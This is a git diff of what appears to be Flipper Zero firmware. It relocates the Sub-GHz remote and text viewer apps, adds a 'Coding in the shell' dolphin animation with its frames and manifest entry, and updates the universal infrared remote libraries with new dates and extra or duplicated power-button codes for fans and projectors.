applications/system/subghz_remote/scenes/subrem_scene_open_map_file.c diff --git a/applications/external/subghz_remote/scenes/subrem_scene_open_sub_file.c b/applications/system/subghz_remote/scenes/subrem_scene_open_sub_file.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_open_sub_file.c rename to applications/system/subghz_remote/scenes/subrem_scene_open_sub_file.c diff --git a/applications/external/subghz_remote/scenes/subrem_scene_remote.c b/applications/system/subghz_remote/scenes/subrem_scene_remote.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_remote.c rename to applications/system/subghz_remote/scenes/subrem_scene_remote.c diff --git a/applications/external/subghz_remote/scenes/subrem_scene_start.c b/applications/system/subghz_remote/scenes/subrem_scene_start.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_start.c rename to applications/system/subghz_remote/scenes/subrem_scene_start.c diff --git a/applications/external/subghz_remote/subghz_remote_app.c b/applications/system/subghz_remote/subghz_remote_app.c similarity index 100% rename from applications/external/subghz_remote/subghz_remote_app.c rename to applications/system/subghz_remote/subghz_remote_app.c diff --git a/applications/external/subghz_remote/subghz_remote_app_i.c b/applications/system/subghz_remote/subghz_remote_app_i.c similarity index 100% rename from applications/external/subghz_remote/subghz_remote_app_i.c rename to applications/system/subghz_remote/subghz_remote_app_i.c diff --git a/applications/external/subghz_remote/subghz_remote_app_i.h b/applications/system/subghz_remote/subghz_remote_app_i.h similarity index 100% rename from applications/external/subghz_remote/subghz_remote_app_i.h rename to applications/system/subghz_remote/subghz_remote_app_i.h diff --git a/applications/external/subghz_remote/views/edit_menu.c b/applications/system/subghz_remote/views/edit_menu.c similarity index 100% rename from applications/external/subghz_remote/views/edit_menu.c rename to applications/system/subghz_remote/views/edit_menu.c diff --git a/applications/external/subghz_remote/views/edit_menu.h b/applications/system/subghz_remote/views/edit_menu.h similarity index 100% rename from applications/external/subghz_remote/views/edit_menu.h rename to applications/system/subghz_remote/views/edit_menu.h diff --git a/applications/external/subghz_remote/views/remote.c b/applications/system/subghz_remote/views/remote.c similarity index 100% rename from applications/external/subghz_remote/views/remote.c rename to applications/system/subghz_remote/views/remote.c diff --git a/applications/external/subghz_remote/views/remote.h b/applications/system/subghz_remote/views/remote.h similarity index 100% rename from applications/external/subghz_remote/views/remote.h rename to applications/system/subghz_remote/views/remote.h diff --git a/applications/external/text_viewer/application.fam b/applications/system/text_viewer/application.fam similarity index 100% rename from applications/external/text_viewer/application.fam rename to applications/system/text_viewer/application.fam diff --git a/applications/external/text_viewer/icons/text_10px.png b/applications/system/text_viewer/icons/text_10px.png similarity index 100% rename from applications/external/text_viewer/icons/text_10px.png rename to applications/system/text_viewer/icons/text_10px.png diff --git a/applications/external/text_viewer/scenes/text_viewer_scene.c b/applications/system/text_viewer/scenes/text_viewer_scene.c similarity index 100% rename from applications/external/text_viewer/scenes/text_viewer_scene.c rename to applications/system/text_viewer/scenes/text_viewer_scene.c diff --git a/applications/external/text_viewer/scenes/text_viewer_scene.h b/applications/system/text_viewer/scenes/text_viewer_scene.h similarity index 100% rename from applications/external/text_viewer/scenes/text_viewer_scene.h rename to applications/system/text_viewer/scenes/text_viewer_scene.h diff --git a/applications/external/text_viewer/scenes/text_viewer_scene_config.h b/applications/system/text_viewer/scenes/text_viewer_scene_config.h similarity index 100% rename from applications/external/text_viewer/scenes/text_viewer_scene_config.h rename to applications/system/text_viewer/scenes/text_viewer_scene_config.h diff --git a/applications/external/text_viewer/scenes/text_viewer_scene_show.c b/applications/system/text_viewer/scenes/text_viewer_scene_show.c similarity index 100% rename from applications/external/text_viewer/scenes/text_viewer_scene_show.c rename to applications/system/text_viewer/scenes/text_viewer_scene_show.c diff --git a/applications/external/text_viewer/text_viewer.c b/applications/system/text_viewer/text_viewer.c similarity index 100% rename from applications/external/text_viewer/text_viewer.c rename to applications/system/text_viewer/text_viewer.c diff --git a/applications/external/text_viewer/text_viewer.h b/applications/system/text_viewer/text_viewer.h similarity index 100% rename from applications/external/text_viewer/text_viewer.h rename to applications/system/text_viewer/text_viewer.h diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_0.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_0.png new file mode 100644 index 000000000..e34e79690 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_0.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_1.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_1.png new file mode 100644 index 000000000..cc6032ad3 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_1.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_10.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_10.png new file mode 100644 index 000000000..a28a21225 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_10.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_11.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_11.png new file mode 100644 index 000000000..3d94c8910 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_11.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_12.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_12.png new file mode 100644 index 000000000..74e0b962c Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_12.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_13.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_13.png new file mode 100644 index 000000000..3269169e4 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_13.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_14.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_14.png new file mode 100644 index 000000000..42f844d3d Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_14.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_15.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_15.png new file mode 100644 index 000000000..861b16c65 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_15.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_16.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_16.png new file mode 100644 index 000000000..2f4b3b839 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_16.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_17.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_17.png new file mode 100644 index 000000000..7cba6f795 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_17.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_18.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_18.png new file mode 100644 index 000000000..0b8fe650e Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_18.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_19.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_19.png new file mode 100644 index 000000000..e3c50e308 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_19.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_2.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_2.png new file mode 100644 index 000000000..c259b5a5a Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_2.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_20.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_20.png new file mode 100644 index 000000000..ae6e76532 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_20.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_21.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_21.png new file mode 100644 index 000000000..e97affd7e Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_21.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_22.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_22.png new file mode 100644 index 000000000..b5c615924 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_22.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_23.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_23.png new file mode 100644 index 000000000..ef4876275 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_23.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_24.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_24.png new file mode 100644 index 000000000..4dfe3a029 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_24.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_25.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_25.png new file mode 100644 index 000000000..1f9d6ac54 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_25.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_26.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_26.png new file mode 100644 index 000000000..379e29b50 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_26.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_27.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_27.png new file mode 100644 index 000000000..16210a792 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_27.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_28.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_28.png new file mode 100644 index 000000000..7685c3bc3 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_28.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_29.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_29.png new file mode 100644 index 000000000..5f114a479 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_29.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_3.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_3.png new file mode 100644 index 000000000..3f5c523ac Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_3.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_30.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_30.png new file mode 100644 index 000000000..645ffa669 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_30.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_31.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_31.png new file mode 100644 index 000000000..a086ba60c Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_31.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_32.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_32.png new file mode 100644 index 000000000..4fdc011d1 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_32.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_33.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_33.png new file mode 100644 index 000000000..f9789d8b8 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_33.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_34.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_34.png new file mode 100644 index 000000000..e13f825fa Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_34.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_35.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_35.png new file mode 100644 index 000000000..05f9639b9 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_35.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_36.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_36.png new file mode 100644 index 000000000..a968fd015 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_36.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_37.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_37.png new file mode 100644 index 000000000..8393e3ce8 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_37.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_38.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_38.png new file mode 100644 index 000000000..5e6c32499 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_38.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_39.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_39.png new file mode 100644 index 000000000..7ca97b4a7 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_39.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_4.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_4.png new file mode 100644 index 000000000..11253dd62 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_4.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_40.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_40.png new file mode 100644 index 000000000..a1ac9f6f3 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_40.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_41.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_41.png new file mode 100644 index 000000000..c33f03e92 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_41.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_42.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_42.png new file mode 100644 index 000000000..dc51592c7 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_42.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_43.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_43.png new file mode 100644 index 000000000..ff83fe771 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_43.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_44.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_44.png new file mode 100644 index 000000000..a5488fcb1 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_44.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_45.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_45.png new file mode 100644 index 000000000..86630e83a Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_45.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_46.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_46.png new file mode 100644 index 000000000..a9147ae3c Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_46.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_47.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_47.png new file mode 100644 index 000000000..f5b4529e4 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_47.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_48.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_48.png new file mode 100644 index 000000000..1f27241b7 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_48.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_49.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_49.png new file mode 100644 index 000000000..f5656a750 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_49.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_5.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_5.png new file mode 100644 index 000000000..1545c0ee7 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_5.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_50.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_50.png new file mode 100644 index 000000000..1ff2a8874 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_50.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_51.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_51.png new file mode 100644 index 000000000..3608e114f Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_51.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_52.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_52.png new file mode 100644 index 000000000..f109b562b Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_52.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_53.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_53.png new file mode 100644 index 000000000..a91b863c7 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_53.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_54.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_54.png new file mode 100644 index 000000000..052196298 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_54.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_55.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_55.png new file mode 100644 index 000000000..b8a8c6512 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_55.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_56.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_56.png new file mode 100644 index 000000000..44f5bf6d2 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_56.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_57.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_57.png new file mode 100644 index 000000000..f7c1e8023 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_57.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_58.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_58.png new file mode 100644 index 000000000..61efe9f45 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_58.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_59.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_59.png new file mode 100644 index 000000000..d0bfc886c Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_59.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_6.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_6.png new file mode 100644 index 000000000..f99662e70 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_6.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_60.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_60.png new file mode 100644 index 000000000..950152b73 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_60.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_61.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_61.png new file mode 100644 index 000000000..4e430d5c5 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_61.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_7.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_7.png new file mode 100644 index 000000000..cf09a7842 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_7.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_8.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_8.png new file mode 100644 index 000000000..d12fa6aba Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_8.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_9.png b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_9.png new file mode 100644 index 000000000..ace68d642 Binary files /dev/null and b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/frame_9.png differ diff --git a/assets/dolphin/external/L2_Coding_in_the_shell_128x64/meta.txt b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/meta.txt new file mode 100644 index 000000000..0378846c4 --- /dev/null +++ b/assets/dolphin/external/L2_Coding_in_the_shell_128x64/meta.txt @@ -0,0 +1,23 @@ +Filetype: Flipper Animation +Version: 1 + +Width: 128 +Height: 64 +Passive frames: 21 +Active frames: 44 +Frames order: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 17 19 20 21 22 23 24 24 25 26 27 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 +Active cycles: 1 +Frame rate: 2 +Duration: 3600 +Active cooldown: 7 + +Bubble slots: 1 + +Slot: 0 +X: 7 +Y: 46 +Text: GOOD JOB! +AlignH: Center +AlignV: Top +StartFrame: 54 +EndFrame: 57 \ No newline at end of file diff --git a/assets/dolphin/external/manifest.txt b/assets/dolphin/external/manifest.txt index ed1a827aa..4921c5523 100644 --- a/assets/dolphin/external/manifest.txt +++ b/assets/dolphin/external/manifest.txt @@ -168,3 +168,10 @@ Max butthurt: 14 Min level: 14 Max level: 30 Weight: 4 + +Name: L2_Coding_in_the_shell_128x64 +Min butthurt: 0 +Max butthurt: 14 +Min level: 22 +Max level: 30 +Weight: 4 diff --git a/assets/resources/infrared/assets/audio.ir b/assets/resources/infrared/assets/audio.ir index 2f44cf926..d3e45c34e 100644 --- a/assets/resources/infrared/assets/audio.ir +++ b/assets/resources/infrared/assets/audio.ir @@ -1,7 +1,7 @@ Filetype: IR library file Version: 1 # Last Updated 1st Sept, 2023 -# Last Checked 1st Sept, 2023 +# Last Checked 14th Sept, 2023 # name: Power type: parsed diff --git a/assets/resources/infrared/assets/fans.ir b/assets/resources/infrared/assets/fans.ir index 6b728f708..e560e1c78 100644 --- a/assets/resources/infrared/assets/fans.ir +++ b/assets/resources/infrared/assets/fans.ir @@ -1,7 +1,7 @@ Filetype: IR library file Version: 1 -#Last Updated 1st Sept, 2023 -#Last Checked 1st Sept, 2023 +#Last Updated 14th Sept, 2023 +#Last Checked 14th Sept, 2023 # name: Power type: raw @@ -1989,3 +1989,9 @@ type: raw frequency: 38000 duty_cycle: 0.33 data: 8993 4485 589 1651 589 529 590 529 591 530 590 530 589 530 590 531 589 530 589 531 589 1649 590 1650 589 1649 590 1650 589 1651 588 1649 590 1650 589 1654 585 1650 589 1651 588 1650 590 533 586 531 588 532 588 530 590 530 590 532 587 531 588 530 589 1650 589 1650 589 1652 587 1651 588 1651 588 1650 589 1650 589 1652 587 530 590 530 589 530 589 531 588 531 588 531 588 530 589 531 588 1651 588 1650 590 1651 589 1651 589 +# +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 +data: 2280 776 785 1565 783 796 782 790 783 1549 783 810 752 805 752 800 752 858 752 830 752 826 776 797 775 793 774 789 773 810 747 805 747 102605 2223 832 752 1595 753 825 752 820 752 1581 752 811 751 806 751 802 750 860 750 833 775 804 773 799 773 795 773 790 773 785 772 780 773 diff --git a/assets/resources/infrared/assets/projectors.ir b/assets/resources/infrared/assets/projectors.ir index b33be0681..46e6abd7d 100644 --- a/assets/resources/infrared/assets/projectors.ir +++ b/assets/resources/infrared/assets/projectors.ir @@ -1,8 +1,16 @@ Filetype: IR library file Version: 1 -# Last Updated 1st Sept, 2023 -# Last Checked 1st Sept, 2023 +# Last Updated 14th Sept, 2023 +# Last Checked 14th Sept, 2023 # +# TEMPORARY POWER FIX EDITION (All power buttons duplicated for a double press) +# +# ON +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 +data: 310 27591 171 27662 241 27731 307 27575 107 27749 306 27551 130 55520 243 27614 217 55584 129 27743 119 27756 115 27747 163 27712 308 27502 243 27650 217 27732 175 27693 167 27698 166 27689 171 27622 215 27712 133 27658 216 27716 129 27732 162 27698 305 27571 131 27753 310 27570 170 27707 162 27707 175 10960 9194 4518 618 542 618 543 725 434 672 1623 671 1647 646 514 592 568 592 568 592 1702 592 568 592 567 593 1702 592 568 618 1676 618 1676 618 1676 618 543 617 543 617 543 617 1677 617 544 616 544 616 544 616 544 616 1678 616 1678 616 1678 616 544 616 1678 616 1679 615 1678 616 1678 616 40239 9196 2250 617 # ON name: Power type: raw @@ -34,6 +42,12 @@ protocol: NEC address: 08 00 00 00 command: 0B 00 00 00 # +name: Power +type: parsed +protocol: NEC +address: 08 00 00 00 +command: 0B 00 00 00 +# name: Vol_dn type: parsed protocol: NEC @@ -71,6 +85,18 @@ address: 08 13 00 00 command: 87 78 00 00 # name: Power +type: parsed +protocol: NECext +address: 08 13 00 00 +command: 87 78 00 00 +# +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 +data: 9055 4338 672 1551 669 1553 618 1603 619 481 617 482 616 481 617 507 591 1605 645 479 619 1577 645 1578 644 1578 644 479 619 480 618 1581 641 480 617 1605 617 1606 616 1606 615 483 615 1608 614 484 614 484 614 484 614 484 614 484 614 484 614 1609 614 484 614 1609 614 1609 613 1609 613 40058 9000 2068 614 95467 9022 2068 614 +# +name: Power type: raw frequency: 38000 duty_cycle: 0.330000 @@ -124,6 +150,18 @@ protocol: NEC address: 02 00 00 00 command: 1D 00 00 00 # +name: Power +type: parsed +protocol: NEC +address: 02 00 00 00 +command: 1D 00 00 00 +# +# ON +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 +data: 9096 4436 620 505 647 478 648 501 623 1599 647 1624 623 502 623 503 621 504 619 1628 618 507 617 507 617 1630 617 508 616 1630 617 1630 617 1631 616 508 616 508 617 508 616 1631 616 508 617 508 617 508 616 508 616 1630 616 1630 616 1631 616 508 616 1630 617 1630 617 1630 617 1631 617 509 616 508 616 509 616 509 616 509 616 509 615 509 616 508 617 1631 616 1631 615 1631 616 1631 616 1631 616 1631 616 1631 615 1631 616 14435 9093 2186 615 96359 9095 2184 617 # ON name: Power type: raw @@ -155,6 +193,12 @@ frequency: 38000 duty_cycle: 0.330000 data: 9014 4332 661 1570 661 471 660 473 658 474 657 476 655 498 633 498 634 502 633 499 633 1599 632 1599 632 1599 632 1599 632 1599 632 1600 631 1603 632 500 632 501 631 501 631 501 631 501 631 501 631 1601 631 504 631 1601 631 1601 631 1601 631 1601 631 1601 630 1601 630 501 631 1601 631 38177 8983 2149 630 # +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 +data: 9014 4332 661 1570 661 471 660 473 658 474 657 476 655 498 633 498 634 502 633 499 633 1599 632 1599 632 1599 632 1599 632 1599 632 1600 631 1603 632 500 632 501 631 501 631 501 631 501 631 501 631 1601 631 504 631 1601 631 1601 631 1601 631 1601 631 1601 630 1601 630 501 631 1601 631 38177 8983 2149 630 +# name: Vol_up type: parsed protocol: NEC @@ -183,7 +227,7 @@ name: Power type: raw frequency: 38000 duty_cycle: 0.330000 -data: 529 7218 126 6585 219 703 180 5362 427 18618 177 +data: 3522 1701 472 426 444 1269 472 426 444 426 443 427 443 427 443 426 444 427 443 426 444 427 442 428 441 429 440 431 438 1304 437 433 437 433 438 433 437 433 437 434 436 434 436 434 436 434 436 434 436 1305 436 434 436 434 436 434 436 1305 436 434 436 434 436 1305 436 435 435 435 435 435 435 435 435 435 435 435 435 435 435 459 411 459 411 459 411 1330 411 1330 411 1330 411 1330 411 1330 411 460 410 459 411 459 411 1330 411 1330 411 460 410 1330 411 1330 411 1331 410 1330 411 74392 3516 1736 436 433 437 1304 437 433 437 433 437 433 437 433 437 433 437 434 436 433 437 434 436 434 436 434 436 434 436 1305 436 434 436 434 436 434 436 434 436 434 436 434 436 434 436 434 436 434 436 1305 436 434 436 434 436 435 435 1305 436 435 435 435 435 1306 435 435 435 435 435 435 435 436 434 436 434 436 434 435 435 436 434 436 434 436 434 1330 411 1331 410 1330 411 1330 411 1330 411 459 411 460 410 460 410 